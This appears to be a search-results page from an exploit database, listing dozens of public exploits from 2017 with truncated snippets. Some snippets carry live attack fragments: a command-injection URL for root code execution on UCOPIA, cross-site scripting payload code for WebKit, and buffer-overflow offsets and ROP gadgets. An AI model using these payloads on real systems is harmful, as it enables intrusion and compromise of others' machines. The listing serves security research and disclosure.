47904 matches found
Microsoft Edge Chakra - 'StackScriptFunction::BoxState::Box' Accesses to Uninitialized Pointers (Denial of Service)
/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1338 Here's a snippet of the method that interprets a javascript function's bytecode. Js::Var Js::InterpreterStackFrame::INTERPRETERLOOPNAME PROBESTACKscriptContext, Js::Constants::MinStackInterpreter; closureInitDone...
Windows x64 - API Hooking Shellcode (117 bytes)
Windows x64 - API Hooking Shellcode 117 bytes. Shellcode exploit for Winx86-64 platform / Title : Windows x64 API Hooking Shellcode Author : Roziul Hasan Khan Shifat Size : 117 bytes Date : 16/10/2017 Email : [email protected] Tested On : Windows 7 Ultimate x64 / / This Shellcode hooks...
3CX Phone System 15.5.3554.1 - Directory Traversal
Title: ====== 3CX Phone System - Authenticated Directory Traversal Author: ======= Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG CVE-ID: ======= CVE-2017-15359 Risk Information: ================= CVSS Base Score: 6.8 CVSS Vector: CVSS3AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N Timeline:...
Ikraus Anti Virus 2.16.7 - Remote Code Execution
Vulnerability summary The following advisory describes an remote code execution found in Ikraus Anti Virus version 2.16.7. KARUS anti.virus “secures your personal data and PC from all kinds of malware. Additionally, the Anti-SPAM module protects you from SPAM and malware from e-mails. Prevent...
Linux Kernel < 3.16.39 (Debian 8 x64) - 'inotfiy' Local Privilege Escalation
/ CVE-2017-7533 inotfiy linux kernel vulnerability. $ gcc -o exploit exploit.c -lpthread $./exploit Listening for events. Listening for events. alloclen : 50 longname="testdir/bbbb32103210321032100��1����" handleevents event-name : b, event-len : 16 Detected overwrite!!! callrename done. alloclen...
Webmin 1.850 - Multiple Vulnerabilities
SSD Beyond Security: https://blogs.securiteam.com/index.php/archives/3430 + Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/WEBMIN-v1.850-REMOTE-COMMAND-EXECUTION.txt + ISR: ApparitionSec Vulnerability summary The following...
Chrome 35.0.1916.153 - Sandbox Escape / Command Execution
Sandbox escape Chrome exploit. Allows the execution of local binaries, read/write functions and exfiltration of Chrome OAuth tokens to remote server. More info: https://bugs.chromium.org/p/chromium/issues/detail?id=386988 Download:...
Logitech Media Server - Cross-Site Scripting
Exploit Title: DOM Based Cross Site Scripting XSS - Logitech Media Server Shodan Dork: Logitech Media Server Date: 14/10/2017 Exploit Author: Thiago "THX" Sena Vendor Homepage: https://www.logitech.com Tested on: windows 10 CVE : CVE-2017-15687 ----------------------------------------------- PoC:...
AlienVault Unified Security Management (USM) 5.4.2 - Cross-Site Request Forgery
ADVISORY INFORMATION ======================= Product: AlienVault USM Vendor URL: https://www.alienvault.com Type: Cross-Site Request Forgery CWE-253 Date found: 2017-09-22 Date published: 2017-10-13 CVSSv3 Score: 6.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N CVE: CVE-2017-14956 2. CREDITS...
phpMyFAQ 2.9.8 - Cross-Site Scripting (2)
Exploit Title: phpMyFAQ 2.9.8 Stored XSS Vendor Homepage: http://www.phpmyfaq.de/ Software Link: http://download.phpmyfaq.de/phpMyFAQ-2.9.8.zip Exploit Author: Ishaq Mohammed Contact: https://twitter.com/securityprince Website: https://about.me/security-prince Category: webapps CVE: CVE-2017-1461...
TYPO3 Extension Restler 1.7.0 - Local File Disclosure
Exploit Title: Typo3 Restler Extension - Local File Disclosure Date: 2017-10-13 Exploit Author: CrashBandicot @dosperl Vendor Homepage: https://www.aoe.com/ Software Link: https://extensions.typo3.org/extension/restler/ Tested on : MsWin Version: 1.7.0 last Vulnerability File : getsource.php 3...
FiberHome - Directory Traversal
Vulnerability Summary The following advisory describes a directory traversal vulnerability found in FiberHome routers. FiberHome Technologies Group “was established in 1974. After continuous and intensive development for over 40 years, its business has been extended to R&D, manufacturing, marketi...
Sync Breeze Enterprise 10.1.16 - Remote Buffer Overflow (SEH) (Metasploit)
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class MetasploitModule 'SyncBreeze v10.1.16 SEH GET Overflow', 'Description' = %q There exists an unauthenticated SEH based vulnerability in the HTTP...
Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (30 bytes)
Linux/x86 - execve/bin/sh Polymorphic Shellcode 30 bytes. Shellcode exploit for Linx86 platform / Title: Linux/x86 - Polymorphic execve /bin/sh x86 shellcode - 30 bytes Author: Manuel Mancera @sinkmanu Tested on: Linux 3.16.0-4-586 1 Debian 3.16.43-2+deb8u2 2017-06-26 i686 GNU/Linux...
E-Sic Software livre CMS - 'cpfcnpj' SQL Injection
Exploit Title: E-Sic Software livre CMS - Sql Injection Date: 12/10/2017 Exploit Author: Elber Tavares fireshellsecurity.team/ Vendor Homepage: https://softwarepublico.gov.br/ Version: 1.0 Tested on: kali linux, windows 7, 8.1, 10 - Firefox Download:...
E-Sic Software livre CMS - Autentication Bypass
Exploit Title: E-Sic Software livre CMS - Autentication Bypass Date: 12/10/2017 Exploit Author: Elber Tavares Vendor Homepage: https://softwarepublico.gov.br/ Version: 1.0 Tested on: kali linux, windows 7, 8.1, 10 - Firefox Download...
E-Sic Software livre CMS - 'f' SQL Injection
Exploit Title: E-Sic Software livre CMS - Sql Injection Date: 12/10/2017 Exploit Author: Elber Tavares fireshellsecurity.team/ Vendor Homepage: https://softwarepublico.gov.br/ Version: 1.0 Tested on: kali linux, windows 7, 8.1, 10 - Firefox Download...
E-Sic Software livre CMS - Cross Site Scripting
Exploit Title: E-Sic Software livre CMS - Cross Site Scripting Date: 12/10/2017 Exploit Author: Elber Tavares fireshellsecurity.team/ Vendor Homepage: https://softwarepublico.gov.br/ Version: 1.0 Tested on: kali linux, windows 7, 8.1, 10 - Firefox Download...
E-Sic Software livre CMS - 'q' SQL Injection
Exploit Title: E-Sic Software livre CMS - Blind SQL Injection Date: 12/10/2017 Exploit Author: Guilherme Assmann Vendor Homepage: https://softwarepublico.gov.br/ Version: 1.0 Tested on: kali linux, windows 7, 8.1, 10 - Firefox Download...
OctoberCMS 1.0.425 (Build 425) - Cross-Site Scripting
Exploit Title: OctoberCMS 1.0.425 aka Build 425 Stored XSS Vendor Homepage: https://octobercms.com/ Software Link: https://octobercms.com/download Exploit Author: Ishaq Mohammed https://www.exploit-db.com/author/?a=9086 Contact: https://twitter.com/securityprince Website:...
TP-Link TL-MR3220 - Cross-Site Scripting
Exploit Title: Vulnerability Xss - TP-LINK TL-MR3220 Date: 12/10/2017 Exploit Author: Thiago "THX" Sena Vendor Homepage: http://www.tp-link.com.br Version: TL-MR3220 Tested on: Windows 10 CVE : CVE-2017-15291 Vulnerabilty: Cross-site scripting XSS in TP-LINK TL-MR3220 cve:...
Dreambox Plugin BouquetEditor - Cross-Site Scripting
Exploit Title: Vulnerability XSS - Dreambox Shodan Dork: Dreambox 200 Date: 12/10/2017 Exploit Author: Thiago "THX" Sena Vendor Homepage: https://www.dreamboxupdate.com Version: 2.0.0 Tested on: kali linux, windows 7, 8.1, 10 CVE : CVE-2017-15287 Vulnerabilty: Cross-site scripting XSS in plugin...
Trend Micro InterScan Messaging Security (Virtual Appliance) - 'Proxy.php' Remote Code Execution (Metasploit)
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "Trend Micro InterScan Messaging Security Virtual Appliance Remote Code Execution", 'Description' = %q This module exploits the authentication bypa...
Trend Micro Data Loss Prevention Virtual Appliance 5.2 - Path Traversal
Exploit Title: Trend Micro Data Loss Prevention Virtual Appliance 5.2 Web Path Traversal Date: 10/11/2017 Exploit Author: Leonardo Duarte Contact: http://twitter.com/etakdc Vendor Homepage: http://la.trendmicro.com/la/productos/data-loss-prevention/ Version: 5.2 Tested on: Debian 9 Category:...
ASX to MP3 3.1.3.7 - '.m3u' Local Buffer Overflow
Exploit Title: Buffer Overflow via crafted malicious .m3u file Exploit Author: Parichay Rai Tested on: XP Service Pack 3 CVE : CVE-2017-15221 Description ------------ A buffer overflow Attack possible due to improper input mechanism Proof of Concept ---------------- !/usr/bin/python This exploit...
Trend Micro OfficeScan 11.0/XG (12.0) - Remote Code Execution (Metasploit)
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "Trend Micro OfficeScan Remote Code Execution", 'Description' = %q This module exploits the authentication bypass and command injection vulnerabili...
binutils 2.29.51.20170921 - 'read_1_byte' Heap Buffer Overflow
Source: https://blogs.gentoo.org/ago/2017/09/26/binutils-heap-based-buffer-overflow-in-read1byte-dwarf2-c/ Description: binutils is a set of tools necessary to build programs. The complete ASan output of the issue: nm -A -a -l -S -s --special-syms --synthetic --with-symbol-versions -D $FILE...
Complain Management System - Hard-Coded Credentials / Blind SQL injection
Exploit Title : Complain Management System Blind SQL Injection Date: 10 October 2017 Exploit Author: havysec Tested on: ubuntu14.04 Vendor: https://sourceforge.net/projects/complain-management-system/ Version: not supplied Download Software:...
ClipShare 7.0 - SQL Injection
Exploit Title: ClipShare v7.0 - SQL Injection Date: 2017-10-09 Exploit Author: 8bitsec Vendor Homepage: http://www.clip-share.com/ Software Link: http://www.clip-share.com/ Version: 7.0 Tested on: Kali Linux 2.0 | Mac OS 10.12.6 Email: [email protected] Contact: https://twitter.com/8bitsec Relea...
Rancher Server - Docker Daemon Code Execution (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Rancher Server - Docker Exploit', 'Description' = %q Utilizing Rancher Server, an attacker can create a docker container with the '/' path mounte...
VX Search Enterprise 10.1.12 - Remote Buffer Overflow
!/usr/bin/env python Exploit Title : VX Search Enterprise v10.1.12 Remote Buffer Overflow Exploit Author : Revnic Vasile Email : revnicatgmaildotcom Date : 09-10-2017 Vendor Homepage : http://www.flexense.com/ Software Link : http://www.vxsearch.com/setups/vxsearchentsetupv10.1.12.exe Version :...
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (2)
!/usr/bin/python import requests import re import signal from optparse import OptionParser class bcolors: HEADER = '\03395m' OKBLUE = '\03394m' OKGREEN = '\03392m' WARNING = '\03393m' FAIL = '\03391m' ENDC = '\0330m' BOLD = '\0331m' UNDERLINE = '\0334m' banner=""" / \ \ / / | | \ / / | | / | \ /...
OrientDB 2.2.2 < 2.2.22 - Remote Code Execution (Metasploit)
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'OrientDB 2.2.x Remote Code Execution', 'Description' = %q This module leverages a privilege escalation on OrientDB to execute unsandboxed OS...
PHP Melody 2.7.3 - Multiple Vulnerabilities
Vulnerabilities Summary The following advisory describes three 3 vulnerabilities found in PHP Melody version 2.7.3. PHP Melody is a “self-hosted Video CMS which evolved over the last 9 years. SEO optimization, unbeaten security and speed are advantages you no longer have to compromise on. A truly...
QNAP HelpDesk < 1.1.12 - SQL Injection
Vulnerability Summary The following advisory describes a SQL injection found in QTS Helpdesk versions 1.1.12 and earlier. QNAP helpdesk: “Starting from QTS 4.2.2 you can use the built-in Helpdesk app to directly submit help requests to QNAP from your NAS. To do so, ensure your NAS can reach the...
ASX to MP3 converter < 3.1.3.7 - '.asx' Local Stack Overflow (DEP Bypass)
import struct,sys head =''' REF HREF="mms://site.com/ach/music/smpl/LACA-05928-002-tes''' offset 17375 junk = "A" 17375 0x1003df8e 0x774e1035 EIP="\x36\x10\x4e\x77" adjust="A" 4 def createropchain: ropgadgets = 0x73dd5dce, POP EAX RETN MFC42.DLL 0x5d091368, ptr to &VirtualProtect IAT COMCTL32.dll...
PyroBatchFTP 3.17 - Buffer Overflow (SEH)
!/usr/bin/python print "PyroBatchFTP Local Buffer Overflow SEH Server" Author: Kevin McGuigan @h3xagram Author Website: https://www.7elements.co.uk Vendor Website: https://www.emtech.com Date: 07/10/2017 Version: 3.17 Tested on: Windows 7 32-bit CVE: CVE-2017-15035 import socket import sys...
Microsoft Windows 10 RS2 (x64) - 'win32kfull!bFill' Pool Overflow
Sources: https://siberas.de/blog/2017/10/05/exploitationcasestudywildpooloverflowCVE-2016-3309reloaded.html https://github.com/siberas/CVE-2016-3309Reloaded Exploits for the recently-patched win32kfull!bFill vulnerability. Executing the Palette or Bitmap exploit will give you SYSTEM privileges on...
Easy MPEG/AVI/DIVX/WMV/RM to DVD - 'Enter User Name' Local Buffer Overflow (SEH)
!/usr/bin/python Exploit Title: Easy MPEG/AVI/DIVX/WMV/RM to DVD - 'Enter User Name' Field Buffer Overflow SEH Date: 05-10-2017 Exploit Author: Venkat Rajgor Vendor Homepage: http://www.divxtodvd.net/ Software Link: http://www.divxtodvd.net/easyvideotodvd.exe Tested On: Windows 7 x64 To reproduce...
ClipBucket 2.8.3 - Remote Code Execution
Exploit Title: ClipBucket PHP Script Remote Code Execution RCE Date: 2017-10-04 Exploit Author: Esecurity.ir Vendor Homepage: https://clipbucket.com/ Version: 2.8.3 Exploit Code By : Meisam Monsef - Email : [email protected] - TelgramID : @meisamrce Usage Exploit : exploit.py...
WebKit JSC - 'BytecodeGenerator::emitGetByVal' Incorrect Optimization (2)
function f let o = ; for let i in xx: 0 for i of 0 printoi; f;...
Webkit (Chome < 61) - 'MHTML' Universal Cross-site Scripting
MIME-Version: 1.0 Content-Type: multipart/related; type="text/html"; boundary="----MultipartBoundary--" CVE-2017-5124 ------MultipartBoundary-- Content-Type: application/xml; ------MultipartBoundary-- Content-Type: text/html Content-Location: https://google.com alert'Location origin:...
Webkit (Safari) - Universal Cross-site Scripting
function Pewvar doc=open'parent-tab://apple.com';doc.document.body.innerHTML='';Click me! Exploit by Frans Rosén html data:text/html,function yx=open'parent-tab://google.com','top',x.document.body.innerHTML='';setTimeouty,100 -- function...
EPESI 1.8.2 rev20170830 - Cross-Site Scripting
Exploit Title: Multiple Stored XSS in EPESI Date: 10/03/2017 Exploit Author: Zeeshan Shaikh Vendor Homepage: http://epe.si/ Software Link: http://epe.si/download/ Version: 1.8.2 rev20170830 CVE : CVE-2017-14712 to CVE-2017-14717 Category: webapps XSS 1 Tasks - Title Steps to recreate: 1...
Fiberhome AN5506-04-F - Command Injection
Exploit Title: Fiberhome an5506-04-f – -PING- COMMAND INJECTION Date: 03.10.2017 Exploit Author: Tauco Vendor Homepage: http://hk.fiberhomegroup.com Version: RP2609 Tested on: Windows 10 Description: =========================================================================== Command injection is ...
DiskBoss Enterprise 8.4.16 - Local Buffer Overflow
!/usr/bin/python ======================================================================================================================== Exploit Author: C4t0ps1s Exploit Title: DiskBoss Enterprise v8.4.16 Local Buffer OverflowCode execution Date: 03-10-2017 Twitter: @C4t0ps1s Email:...
Dnsmasq < 2.78 - Information Leak
''' Sources: https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14494.py https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html Sadly, there are no easy docker setup instructions available. Setup a simple network with...
Dnsmasq < 2.78 - Lack of free() Denial of Service
''' Sources: https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14495.py https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html dnsmasq is vulnerable only if one of the following option is specified: --add-mac,...
OpenText Document Sciences xPression 4.5SP1 Patch 13 - 'jobRunId' SQL Injection
Title: OpenText Document Sciences xPression formerly EMC Document Sciences xPression - SQL Injection Author: Marcin Woloszyn Date: 27. September 2017 CVE: CVE-2017-14757 Affected Software: ================== OpenText Document Sciences xPression formerly EMC Document Sciences xPression Exploit was...
UCOPIA Wireless Appliance < 5.1 (Captive Portal) - Root Remote Code Execution
Exploit Title: Unauthenticated remote root code execution on captive portal Ucopia '/var/www/html/upload/bd.php;echo%20t As php is in sudoers without password... https://controller.access.network/upload/bd.php?0=sudo%20/usr/bin/php%20-r%20%27system"id";%27 Just push your ssh key and get nice root...